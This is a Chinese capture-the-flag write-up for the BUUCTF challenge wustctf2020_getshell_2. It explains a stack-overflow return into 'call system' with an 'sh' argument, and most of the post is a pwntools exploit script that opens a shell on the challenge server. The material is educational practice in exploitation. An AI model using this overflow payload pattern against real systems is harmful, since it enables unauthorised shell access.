PWN

BUU|PWN|wustctf2020_getshell_2

Posted by Elli0t on 2020-06-03

此题是一个非常简单的栈溢出,但是却从中学到了新知识

  • system 函数只需要”sh”便能 getshell
  • 当 syscall 长度被限制(只有8个字节,如果写了返回地址就没法用参数了),解决办法是找到 call system 指令,直接使用这样就不用压入返回地址,就能省4个字节来压入”sh”的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#coding:utf-8
from pwn import *
import time

context.terminal=["tmux","sp","-h"]
context.log_level='debug'

DEBUG = 0
LOCAL = True
BIN = './wustctf2020_getshell_2'
HOST = 'node3.buuoj.cn'
PORT = 25450

def exploit(sh):
s_h = 0x08048670
system = 0x8048529
payload = 'a'*28 + p32(system) + p32(s_h)
time.sleep(1)
sh.sendline(payload)
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)
参考链接

https://blog.csdn.net/weixin_45461609/article/details/105166662